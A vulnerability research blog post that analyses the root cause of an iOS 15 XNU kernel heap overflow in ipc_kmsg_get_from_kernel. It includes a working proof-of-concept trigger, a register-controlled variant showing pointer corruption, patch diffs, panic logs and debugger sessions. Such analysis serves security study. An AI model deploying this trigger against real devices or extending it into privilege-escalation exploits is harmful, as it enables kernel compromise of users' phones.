ipc_kmsg_vuln_blogpost

ipc_kmsg_get_from_kernel, iOS 15.4 - root cause analysis

This blogpost is about an old (and very interesting) vulnerability in XNU, introduced in iOS 15.0 beta and patched in iOS 15.4. I thought it might be nice to look into it, write an organized summary of the technical details, and show how this could be used to gain powerful exploitation primitives.

The goal of this blogpost is not to build an exploit; it’s to spread knowledge and help researchers better understand the fundamentals of this interesting vulnerability.

All the tests and examples in this blogpost were run on a virtual iPhone 13 running iOS 15.3.1 (19D52) on Corellium.

The vulnerability

History and credits

First of all, let’s start with some history and credits. On March 16, 2022, John Åkerblom tweeted the following:

“iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox”

Then, Synacktiv quoted that tweet with a tweetable POC:

“The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}”

Awesome, we have a POC. Let’s dig in and see the vulnerable function and understand the root cause of the vulnerability. Finding the vulnerable function is easy - mostly because people already explicitly revealed that on Twitter:

Brightiup tweeted the following comment as a response to John Åkerblom.

“ipc_kmsg_get_from_kernel()?”

We have a POC, which we can run to panic a vulnerable device and then analyze the crash.

Ok great, so we know the vulnerability is in the function ipc_kmsg_get_from_kernel in osfmk/ipc/ipc_kmsg.c.

The patch

We can bindiff the patch, but since it’s in the opensource part of the kernel, let’s just see the relevant commit in apple-oss-distributions/xnu. This is the commit that fixes the vulnerability, and here is the relevant patch:

@@ -2036,7 +2042,7 @@ ipc_kmsg_get_from_user(
 mach_msg_return_t
 ipc_kmsg_get_from_kernel(
        mach_msg_header_t       *msg,
-       mach_msg_size_t         size,
+       mach_msg_size_t         size, /* can be larger than prealloc space */
        ipc_kmsg_t              *kmsgp)
 {
        ipc_kmsg_t      kmsg;
@@ -2064,6 +2070,11 @@ ipc_kmsg_get_from_kernel(
                        ip_mq_unlock(dest_port);
                        return MACH_SEND_NO_BUFFER;
                }
+               assert(kmsg->ikm_size == IKM_SAVED_MSG_SIZE);
+               if (size + MAX_TRAILER_SIZE > kmsg->ikm_size) {
+                       ip_mq_unlock(dest_port);
+                       return MACH_SEND_TOO_LARGE;
+               }
                ikm_prealloc_set_inuse(kmsg, dest_port);
                ikm_set_header(kmsg, NULL, size);
                ip_mq_unlock(dest_port);
@@ -2402,6 +2413,17 @@ ipc_kmsg_put_to_user(
                __unreachable_ok_pop
        }

Wow, very straightforward. We have a new check for the case where the size argument is too large, and even a comment that says “can be larger than prealloc space”. The root cause of the vulnerability is now pretty clear: it’s possible to reach ipc_kmsg_get_from_kernel with a destination port whose preallocated kmsg is smaller than the size argument. This results in a heap OOB write.
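To make the new check concrete, here is a minimal user-space sketch of the comparison the patch adds. The two SKETCH_ constants are stand-in values chosen for illustration (assumptions, not copied from the XNU headers), and sketch_prealloc_check is a hypothetical helper, not a kernel function.

```c
#include <stdint.h>

/* Stand-in values: ASSUMPTIONS for illustration, not taken from XNU headers. */
#define SKETCH_MAX_TRAILER_SIZE  0x44u   /* assumed space reserved for the trailer */
#define SKETCH_SAVED_MSG_SIZE    0xa0u   /* assumed capacity of the preallocated kmsg */

enum sketch_result { SKETCH_OK = 0, SKETCH_TOO_LARGE = 1 };

/* Mirrors the comparison added by the patch:
 *   size + MAX_TRAILER_SIZE > kmsg->ikm_size  =>  MACH_SEND_TOO_LARGE
 * The sum is widened to 64 bits so it cannot wrap in this model. */
enum sketch_result
sketch_prealloc_check(uint32_t size, uint32_t ikm_size)
{
    if ((uint64_t)size + SKETCH_MAX_TRAILER_SIZE > ikm_size) {
        return SKETCH_TOO_LARGE;
    }
    return SKETCH_OK;
}
```

With these stand-in values, a 0x150-byte message is rejected, while a message of up to 0x5c bytes still fits next to the trailer.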

Cool, let’s get to the POC - understand it, execute it, and analyze the panic.

Analyzing the panic

POC high-level overview

Let’s start with the POC:

void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;}
int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}

I would like to refactor it a bit - use enums/definitions instead of constants, etc.:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);
    __builtin_trap();
    return arg;
}

void trigger_corruption(void) {
    pthread_t t;
    int p = mk_timer_create();
    
    mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
    pthread_create(&t, 0, trigger_breakpoint, &p);
    for(;;);
}

void poc(void) {
    printf("trigger\n");
    trigger_corruption();
}

The POC does the following:

Calls mk_timer_create, which returns a mach_port_name_t for a new mktimer port.
Inserts a send right for that port into our own task, using MACH_MSG_TYPE_MAKE_SEND.
Sets the thread’s exception port with:
- new_mask == EXC_MASK_ALL
- new_port == the mktimer’s port
- new_behavior == EXCEPTION_STATE
- new_flavor == ARM_THREAD_STATE64
Raises a breakpoint exception (EXC_BREAKPOINT).

I expected to see mktimer here; that’s the only kind of port making use of the preallocated kmsg facility in XNU (osfmk/kern/mk_timer.c):

	/* Pre-allocate a kmsg for the timer messages */
	kmsg = ipc_kmsg_alloc(sizeof(mk_timer_expire_msg_t), 0,
	    IPC_KMSG_ALLOC_KERNEL | IPC_KMSG_ALLOC_ZERO |
	    IPC_KMSG_ALLOC_SAVED | IPC_KMSG_ALLOC_NOFAIL);

XNU actually has an explicit comment on that in mach_port_allocate_full (osfmk/ipc/mach_port.c):

...
	/*
	 * Don't actually honor prealloc requests anymore,
	 * (only mk_timer still uses IP_PREALLOC messages, by hand).
	 *
	 * (for security reasons, and because it isn't guaranteed anyway).
	 * Keep old errors for legacy reasons.
	 */
	if (qosp->prealloc) {
...

Indeed, it seems like in the opensource XNU, prealloc messages are restricted to mktimers. Therefore, we probably are going to pre-allocate a kmsg for a mktimer, and then get to ipc_kmsg_get_from_kernel with size bigger than that.

However, before we get our hands dirty, let’s discuss exception ports :)

Exception ports

I don’t like repeating stuff that is well documented and common knowledge. There are many sources covering exception ports online. For example, an outstanding source of knowledge is the great blogpost by Ian Beer - Exception-oriented exploitation on iOS (April 2017). However, I will briefly mention the necessary details to give everyone a high-level baseline for the flow that happens when we trigger the bug.

Copy-paste from Ian’s fantastic blogpost:

“When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.”

And this is exactly where thread_set_exception_ports comes into play. It lets our thread set its own exception port, with the following arguments:

exception_mask - lets us restrict the types of exceptions we want to handle.
behavior - defines what type of exception message we want to receive.
flavor - lets us specify what kind of process state we want to be included in the message.
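The delivery order from the quote above (thread, then task, then host) can be sketched as a tiny lookup. This is a deliberately simplified model: the struct and function names are hypothetical, a port value of 0 stands for "no handler registered", and it ignores the per-exception masks and the fall-through on delivery failure that the real kernel handles.

```c
/* Hypothetical model of the three levels an exception can be delivered to. */
typedef struct {
    int thread_port;   /* 0 means "no handler registered" in this model */
    int task_port;
    int host_port;
} sketch_exc_ports;

/* Returns the first registered port in thread -> task -> host order,
 * or 0 if nothing is registered at any level. */
int
sketch_pick_exception_port(const sketch_exc_ports *p)
{
    if (p->thread_port != 0) {
        return p->thread_port;
    }
    if (p->task_port != 0) {
        return p->task_port;
    }
    return p->host_port;
}
```

In the POC the thread-level port is set explicitly, so the first branch is the one that matters: the exception message goes to the mktimer port.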

Now we can understand the meaning of the thread_set_exception_ports call. We are setting our thread’s exception ports to handle all possible exceptions (EXC_MASK_ALL). Below, you can see the meaning of these constants:

# define EXCEPTION_STATE                2
/*	Send a catch_exception_raise_state message including the
 *	thread state.
 */

/*
 *  Flavors
 */

...
#define ARM_THREAD_STATE64       6
...

This means that upon exception, the kernel will send a catch_exception_raise_state message including the thread state. Funny enough, Ian had this exact example in his blog:

“Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!”

Great, now we are all on the same page regarding what the POC does. Obviously, the vulnerability we are talking about in this blogpost didn’t exist when Ian published his blogpost. However, and this is where the funny part begins - we are going to use the same primitive Ian used in his research for controlled data - the GPRs from our userspace thread’s state.

Finally, we can get to work.

Run the POC

Executing the POC gives us the following panic:

panic(cpu 5 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb145ea460)
          x0:  0xffffffe21ad5da68 x1:  0xffffffe4cd2ec130  x2:  0xfffffffffffffff8  x3:  0xffffffe21ad5db78
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x004dfd0000000001  x7:  0xffffffeb145ea920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016f9aefc0  x11: 0x00000001004dfd00
          x12: 0x00000001004dfd00 x13: 0x000000016f9aefb0  x14: 0x00000001004dfd00  x15: 0x0000000160001000
          x16: 0x0000000000000000 x17: 0x1a35ffe218f92eb8  x18: 0x0000000000000000  x19: 0xffffffeb145ea818
          x20: 0x0000000000000150 x21: 0xffffffe4cd2ec000  x22: 0xffffffe21ad5db00  x23: 0x0000000000000000
          x24: 0x3ca5ffe21ad5db18 x25: 0x0000000000000000  x26: 0xffffffe4cd2ec000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb145ea7f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb145ea7b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000046          far: 0x0000000000000004

Debugger message: panic
Device: D17
Hardware Model: iPhone14,5
ECID: E651D22C28B68544
Boot args: -v debug=0x14e serial=3 gpu=0 ioasm_behavior=0 -vm_compressor_wk_sw agm-genuine=1 agm-authentic=1 agm-trusted=1
Memory ID: 0x0
OS release type: User
OS version: 19D52

And the faulting instruction is 0xFFFFFFF007BD0174:

FFFFFFF007BD015C loc_FFFFFFF007BD015C    
FFFFFFF007BD015C                 MOV             W2, W20 ; size_t
FFFFFFF007BD0160                 MOV             X1, X21 ; void *
FFFFFFF007BD0164 ; memcpy(kmsg->ikm_header, msg, size);
FFFFFFF007BD0164                 BL              _memmove
FFFFFFF007BD0168                 MOV             W23, #0
FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]
FFFFFFF007BD0178 ; *kmsgp = kmsg;
FFFFFFF007BD0178                 STR             X22, [X19]

And this is the whole ipc_kmsg_get_from_kernel function (without the patch):

/*
 *	Routine:	ipc_kmsg_get_from_kernel
 *	Purpose:
 *		First checks for a preallocated message
 *		reserved for kernel clients.  If not found or size is too large -
 *		allocates a new kernel message buffer.
 *		Copies a kernel message to the message buffer.
 *		Only resource errors are allowed.
 *	Conditions:
 *		Nothing locked.
 *		Ports in header are ipc_port_t.
 *	Returns:
 *		MACH_MSG_SUCCESS	Acquired a message buffer.
 *		MACH_SEND_NO_BUFFER	Couldn't allocate a message buffer.
 */

mach_msg_return_t
ipc_kmsg_get_from_kernel(
	mach_msg_header_t       *msg,
	mach_msg_size_t         size,
	ipc_kmsg_t              *kmsgp)
{
	ipc_kmsg_t      kmsg;
	ipc_port_t      dest_port;

	assert(size >= sizeof(mach_msg_header_t));
	assert((size & 3) == 0);

	dest_port = msg->msgh_remote_port;

	/*
	 * See if the port has a pre-allocated kmsg for kernel
	 * clients.  These are set up for those kernel clients
	 * which cannot afford to wait.
	 */
	if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
		ip_mq_lock(dest_port);
		if (!ip_active(dest_port)) {
			ip_mq_unlock(dest_port);
			return MACH_SEND_NO_BUFFER;
		}
		assert(IP_PREALLOC(dest_port));
		kmsg = dest_port->ip_premsg;
		if (ikm_prealloc_inuse(kmsg)) {
			ip_mq_unlock(dest_port);
			return MACH_SEND_NO_BUFFER;
		}
		ikm_prealloc_set_inuse(kmsg, dest_port);
		ikm_set_header(kmsg, NULL, size);
		ip_mq_unlock(dest_port);
	} else {
		kmsg = ipc_kmsg_alloc(size, 0, IPC_KMSG_ALLOC_KERNEL);
		if (kmsg == IKM_NULL) {
			return MACH_SEND_NO_BUFFER;
		}
	}

	memcpy(kmsg->ikm_header, msg, size);
	kmsg->ikm_header->msgh_size = size;

	*kmsgp = kmsg;
	return MACH_MSG_SUCCESS;
}

So, Synacktiv’s POC crashes on a near-NULL dereference (far is 0x4, the offset of msgh_size from a NULL ikm_header) at the store kmsg->ikm_header->msgh_size = size. Obviously, this isn’t the root cause! Note the order of operations here:

copy size bytes from msg to kmsg->ikm_header
write size to kmsg->ikm_header->msgh_size

The memcpy is successful, while the store operation later fails on NULL-dereference. The explanation is simple - the memcpy goes out-of-bounds and corrupts kmsg->ikm_header with zeros.

The reason the POC works 100% deterministically is that ikm_header does not point to a separate allocation on the heap - it points inside the kmsg structure itself. Let’s see this in detail. First, this is ipc_kmsg:

struct ipc_kmsg {
	struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
	struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
	union {
		ipc_port_t XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_prealloc") ikm_prealloc; /* port we were preallocated from */
		void      *XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_data")     ikm_data;
	};
	mach_msg_header_t          *XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_header") ikm_header;
	ipc_port_t                 XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_voucher_port") ikm_voucher_port;   /* voucher port carried */
	struct ipc_importance_elem *ikm_importance;  /* inherited from */
	queue_chain_t              ikm_inheritance;  /* inherited from link */
	struct turnstile           *ikm_turnstile;   /* send turnstile for ikm_prealloc port */
#if MACH_FLIPC
	struct mach_node           *ikm_node;        /* Originating node - needed for ack */
#endif
	mach_msg_size_t            ikm_size;
	uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
#if IKM_PARTIAL_SIG
	uintptr_t                  ikm_header_sig;   /* sig for just the header */
	uintptr_t                  ikm_headtrail_sig;/* sif for header and trailer */
#endif
	uintptr_t                  ikm_signature;    /* sig for all kernel-processed data */
	ipc_object_copyin_flags_t  ikm_flags;
	mach_msg_qos_t             ikm_qos_override; /* qos override on this kmsg */
	mach_msg_type_name_t       ikm_voucher_type : 8; /* disposition type the voucher came in with */

	uint8_t                    ikm_inline_data[] __attribute__((aligned(4)));
};

The ikm_header field is set by ikm_set_header:

/*
 *	Routine:	ikm_set_header
 *	Purpose:
 *		Set the header (and data) pointers for a message. If the
 *		message is small, the data pointer is NULL and all the
 *		data resides within the fixed
 *		the cache, that is best.  Otherwise, allocate a new one.
 *	Conditions:
 *		Nothing locked.
 */
static void
ikm_set_header(
	ipc_kmsg_t kmsg,
	void *data,
	mach_msg_size_t size)
{
	mach_msg_size_t mtsize = size + MAX_TRAILER_SIZE;
	if (data) {
		kmsg->ikm_data = data;
		kmsg->ikm_header = (mach_msg_header_t *)((uintptr_t)data + kmsg->ikm_size - mtsize);
	} else {
		assert(kmsg->ikm_size == IKM_SAVED_MSG_SIZE);
		kmsg->ikm_header = (mach_msg_header_t *)(vm_offset_t)
		    (kmsg->ikm_inline_data + kmsg->ikm_size - mtsize);
	}
}

If the data argument is NULL (our case), ikm_header is set to point to the ikm_inline_data inside the kmsg allocation.

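Also, in our case, the size argument is too big (possible due to the missing check), so kmsg->ikm_size - mtsize is negative. This means ikm_header goes backward: it points before ikm_inline_data, before its own field in the structure, and (as the debugger session below shows) even before the start of the kmsg!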
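The pointer arithmetic in the data == NULL branch can be modeled in a few lines. This is a sketch under stated assumptions: sketch_header_offset is a hypothetical helper, and the example inputs mentioned afterwards (an ikm_size of 0xa0 and a trailer size of 0x44) are illustrative values, not constants read from the headers.

```c
#include <stdint.h>

/* Offset of ikm_header relative to ikm_inline_data, following the
 * data == NULL branch of ikm_set_header:
 *   ikm_inline_data + ikm_size - (size + MAX_TRAILER_SIZE)
 * A negative result means the header pointer lands BEFORE ikm_inline_data. */
int64_t
sketch_header_offset(uint32_t ikm_size, uint32_t size, uint32_t max_trailer)
{
    return (int64_t)ikm_size - ((int64_t)size + (int64_t)max_trailer);
}
```

For a small message (say 0x28 bytes) with the assumed values, the offset is 0x34 and the header sits inside the inline buffer. For size == 0x150 it is -0xf4, so the header starts 0xf4 bytes before ikm_inline_data.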

The ipc_kmsg structure looks as follows:

--------------------------------------------------
|  struct ipc_kmsg  ;      ikm_inline_data       |
--------------------------------------------------

In our case, the layout is as follows:

    ----------------------------------------------
    |  "underflowed" pointer ikm_header          |
    |                                            |
    v                                            |
--------------------------------------------------
|  struct ipc_kmsg  ;   ...    ; prealloc       |
--------------------------------------------------
         |                      ^
         | correct ikm_header   |
         ------------------------

The important trick

Note that because the mktimer port is (also) a message queue, we can trick it into being the port that receives messages from other things - such as exceptions. In this POC, Synacktiv used exceptions - which is fantastic. With exceptions, we control the thread’s state, meaning we get controlled content from userspace. However, there are other things the kernel could send to an mqueue, and their size could be controlled. These games could maybe let us overflow backward into a previous message, and expand the set of primitives we have.

“Demo” - let’s debug it

We can easily verify this using Corellium and a kernel debugger. The function ipc_kmsg_get_from_kernel is triggered quite a lot, so let’s set a breakpoint on handle_breakpoint (osfmk/arm64/sleh.c), and only when we hit it, set a breakpoint on ipc_kmsg_get_from_kernel.

First of all, set a breakpoint on handle_breakpoint:

(lldb) breakpoint set -a 0xFFFFFFF007D3411C
Breakpoint 1: address = 0xfffffff007d3411c
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 1.1
    frame #0: 0xfffffff007d3411c
->  0xfffffff007d3411c: sub    sp, sp, #0x20
    0xfffffff007d34120: stp    x29, x30, [sp, #0x10]
    0xfffffff007d34124: add    x29, sp, #0x10
    0xfffffff007d34128: adrp   x8, -3369
Target 0: (No executable module.) stopped.

Now, set a breakpoint on the memcpy and the load in ipc_kmsg_get_from_kernel:

FFFFFFF007BD0164 ; memcpy(kmsg->ikm_header, msg, size);
FFFFFFF007BD0164                 BL              _memmove
FFFFFFF007BD0168                 MOV             W23, #0
FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]
FFFFFFF007BD0178 ; *kmsgp = kmsg;
FFFFFFF007BD0178                 STR             X22, [X19]

So 0xFFFFFFF007BD0164 and 0xFFFFFFF007BD016C:

(lldb) breakpoint set -a 0xFFFFFFF007BD0164
Breakpoint 2: address = 0xfffffff007bd0164
(lldb) breakpoint set -a 0xFFFFFFF007BD016C
Breakpoint 3: address = 0xfffffff007bd016c
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 2.1
    frame #0: 0xfffffff007bd0164
->  0xfffffff007bd0164: bl     -0xff634e7f0
    0xfffffff007bd0168: mov    w23, #0x0
    0xfffffff007bd016c: ldr    x16, [x22, #0x18]
    0xfffffff007bd0170: nop    
Target 0: (No executable module.) stopped.
(lldb) reg read x0
      x0 = 0xffffffe4ccd3e768
(lldb) reg read x2
      x2 = 0x0000000000000150
(lldb) reg read x22
     x22 = 0xffffffe4ccd3e800
(lldb) x/8gx $x22
0xffffffe4ccd3e800: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e810: 0xffffffe2fee3ae40 0xffffffe4ccd3e768
0xffffffe4ccd3e820: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e830: 0x0000000000000000 0x0000000000000000
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 3.1
    frame #0: 0xfffffff007bd016c
->  0xfffffff007bd016c: ldr    x16, [x22, #0x18]
    0xfffffff007bd0170: nop    
    0xfffffff007bd0174: str    w20, [x16, #0x4]
    0xfffffff007bd0178: str    x22, [x19]
Target 0: (No executable module.) stopped.
(lldb) x/8gx $x22
0xffffffe4ccd3e800: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e810: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e820: 0x0000000000000000 0xffffffffffffffe1
0xffffffe4ccd3e830: 0x000000016f06f000 0x0000000000000000
(lldb) 

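Yes! Indeed, we can see that the dst of the memcpy (x0 == 0xffffffe4ccd3e768) is 0x98 bytes before x22 (0xffffffe4ccd3e800), which is kmsg. After the memcpy, the ikm_header field (offset 0x18) has been overwritten with zeros.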
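The arithmetic behind that observation is easy to double-check. The sketch below only uses values visible in the lldb session above (x0, x2, x22 and the 0x18 offset from the LDR instruction); the function names are hypothetical.

```c
#include <stdint.h>

#define DBG_MEMCPY_DST  0xffffffe4ccd3e768ull  /* x0 at the memmove call */
#define DBG_KMSG        0xffffffe4ccd3e800ull  /* x22 */
#define DBG_SIZE        0x150ull               /* x2 */
#define IKM_HEADER_OFF  0x18ull                /* from LDR X16, [X22,#0x18] */

/* Bytes written before the start of the kmsg itself. */
uint64_t
sketch_bytes_before_kmsg(void)
{
    return DBG_KMSG - DBG_MEMCPY_DST;
}

/* Bytes written from the start of the kmsg onward. */
uint64_t
sketch_bytes_into_kmsg(void)
{
    return DBG_SIZE - sketch_bytes_before_kmsg();
}

/* 1 if the 8-byte ikm_header field lies entirely inside the copied range. */
int
sketch_header_is_clobbered(void)
{
    uint64_t field_start = DBG_KMSG + IKM_HEADER_OFF;

    return field_start >= DBG_MEMCPY_DST &&
           field_start + 8 <= DBG_MEMCPY_DST + DBG_SIZE;
}
```

The copy starts 0x98 bytes before the kmsg and runs 0xb8 bytes into it, which comfortably covers the ikm_header field at offset 0x18.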

Arbitrary write

As we all know, the rule of life is “arbitrary r/w –> game over”.

Even though an arbitrary write alone doesn’t help (we need to know where the things we would like to corrupt are), let’s do that. As with any OOB write primitive, we need to ask ourselves a couple of questions:

Can we control the length of the corruption?
Can we control the content of the corruption?

The good news is that we control the content of the corruption. Keep in mind the message sent here is from the kernel - specifically, as a response to a software breakpoint (we trigger the handle_breakpoint kernel function). And since we called thread_set_exception_ports with new_behavior == EXCEPTION_STATE and new_flavor == ARM_THREAD_STATE64, the message contains the thread’s state - which we control from userspace!

Regarding the length of the corruption: in the case of EXCEPTION_STATE and ARM_THREAD_STATE64 we do not control the length; however, as I said before - there are other things the kernel could send to an mqueue, and their size could be controlled. Again, keep in mind that size plays two roles here:

It’s the length of the memcpy.
It’s used in the pointer arithmetic, which means it determines how much we go backward in memory and start our corruption.

Anyways, we will keep our technique of using the thread’s state to control the content. So, we do not control the length.

Turning this into an arbitrary write is simple: if we can control the value at *(x22+0x18), we immediately get an arbitrary write of 4 bytes. The store writes w20, which is size, to the address we corrupted (strictly, to that address plus 4, the offset of msgh_size). Note that size is mach_msg_size_t, which is natural_t, which is uint32_t. This means we have only partial control over the value we are writing. In other words, you can consider this a write-what-where of a 32-bit value, where:

“what” is partially controlled and restricted.
“where” is fully controlled.
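To see the two steps interact, here is a toy user-space model of the tail of ipc_kmsg_get_from_kernel. It is only a sketch: the arena stands in for kernel heap memory, sketch_corrupt_and_store is a hypothetical helper, and the only detail borrowed from the real code is the 0x18 offset of the header pointer seen in the disassembly.

```c
#include <stdint.h>
#include <string.h>

#define SK_HEADER_FIELD_OFF 0x18u   /* offset of the header pointer field */

/* Toy model of the last two steps when the copy destination sits
 * `underflow` bytes before the kmsg:
 *   1. memcpy(dst, msg, size) overwrites the header pointer field;
 *   2. the 32-bit `size` is stored at (header pointer + 4).
 * `arena` models memory starting at the copy destination and must hold
 * at least `size` bytes; the message must place a valid pointer at
 * offset underflow + SK_HEADER_FIELD_OFF. */
void
sketch_corrupt_and_store(uint8_t *arena, uint32_t underflow,
    const uint8_t *msg, uint32_t size)
{
    uint8_t *kmsg = arena + underflow;
    unsigned char *hdr;

    memcpy(arena, msg, size);                               /* step 1: OOB copy */
    memcpy(&hdr, kmsg + SK_HEADER_FIELD_OFF, sizeof(hdr));  /* reload the pointer */
    memcpy(hdr + 4, &size, sizeof(size));                   /* step 2: msgh_size store */
}
```

If the message carries the address of a chosen target at offset underflow + 0x18, the 4 bytes at target + 4 end up holding size: the "where" comes from the message, the "what" is fixed to the message length.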

Let’s do that. We could dive into the code and see exactly how the thread state is sent. This is pretty straightforward, but we can do something even simpler - let’s set register values before triggering the breakpoint, and see how that affects the message.

So, let’s modify our trigger_breakpoint function as follows:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);
    
    uint64_t val = 0x4141414141414141;
    asm volatile ("mov x0, %0" : "+r"(val) );
    asm volatile ("mov x1, %0" : "+r"(val) );
    asm volatile ("mov x2, %0" : "+r"(val) );
    asm volatile ("mov x3, %0" : "+r"(val) );
    asm volatile ("mov x4, %0" : "+r"(val) );
    asm volatile ("mov x5, %0" : "+r"(val) );
    asm volatile ("mov x6, %0" : "+r"(val) );
    asm volatile ("mov x7, %0" : "+r"(val) );
    asm volatile ("mov x8, %0" : "+r"(val) );
    asm volatile ("mov x9, %0" : "+r"(val) );
    asm volatile ("mov x10, %0" : "+r"(val) );
    asm volatile ("mov x11, %0" : "+r"(val) );
    asm volatile ("mov x12, %0" : "+r"(val) );
    asm volatile ("mov x13, %0" : "+r"(val) );
    asm volatile ("mov x14, %0" : "+r"(val) );
    
    __builtin_trap();
    return arg;
}

And let’s run our POC and view the new panic:

panic(cpu 4 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb14962460)
          x0:  0xffffffe303acf968 x1:  0xffffffe60025a130  x2:  0xfffffffffffffff8  x3:  0xffffffe303acfa78
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x0263fd0000000001  x7:  0xffffffeb14962920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016d84efc0  x11: 0x000000010263fcb4
          x12: 0x000000010263fcb4 x13: 0x000000016d84efb0  x14: 0x000000010263fd00  x15: 0x0000000160001000
          x16: 0x4141414141414141 x17: 0x1a35ffe3e8ce81b8  x18: 0x0000000000000000  x19: 0xffffffeb14962818
          x20: 0x0000000000000150 x21: 0xffffffe60025a000  x22: 0xffffffe303acfa00  x23: 0x0000000000000000
          x24: 0x3ca5ffe303acfa18 x25: 0x0000000000000000  x26: 0xffffffe60025a000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb149627f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb149627b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000044          far: 0x4141414141414145

Debugger message: panic
Device: D17
Hardware Model: iPhone14,5
ECID: E651D22C28B68544
Boot args: -v debug=0x14e serial=3 gpu=0 ioasm_behavior=0 -vm_compressor_wk_sw agm-genuine=1 agm-authentic=1 agm-trusted=1
Memory ID: 0x0
OS release type: User
OS version: 19D52
Kernel version: Darwin Kernel Version 21.3.0: Wed Jan  5 21:44:44 PST 2022; root:xnu-8019.80.24~23/RELEASE_ARM64_T8110
Kernel UUID: 46EEBD0C-44C8-3A46-A020-57125FE05425

The kernel crashes on the very same instruction (pc==0xfffffff007bd0174), which is str w20, [x16, #0x4]. However, this time, x16==0x4141414141414141 . Great!

Edit: ikm_header is PAC’d

I forgot to mention that: as you can see from the above code, ikm_header is PAC’d (thanks John Åkerblom for respectfully bringing this up :))! Of course, it means this “arbitrary write” is not possible without bypassing PAC. This is a great example of Apple’s great work with dataPAC!

As I said at the very beginning, this short blogpost’s goal is root cause analysis, not writing an exploit - so it doesn’t matter. I only used ikm_header here as proof that we corrupted ipc_kmsg.

Now, when you create a virtual device on Corellium, it runs with PAC disabled by default (it’s faster). Corellium offers PAC simulation (which works great, by the way) in “Settings/General” in their product, with the following note:

“You can simulate the behavior of PAC instructions in mobile processors. With this turned off, PAC will not be added or authenticated on any pointers. Enabling PAC will impact the performance of the device.”

You can clearly see our virtual device runs with PAC disabled because x16 is 0x4141414141414141, while the code (copy/pasted from above) is:

FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]

The AUTDA should corrupt the MSBs of our register (since the signature is clearly incorrect). If you enable PAC and re-run our POC, the very same POC crashes on the very same instruction, with the following register state:

panic(cpu 5 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb14a82460)
          x0:  0xffffffe301879568 x1:  0xffffffe4cd3aa130  x2:  0xfffffffffffffff8  x3:  0xffffffe301879678
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x00e89eb000000001  x7:  0xffffffeb14a82920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016f002fc0  x11: 0x006ef30100e89e90
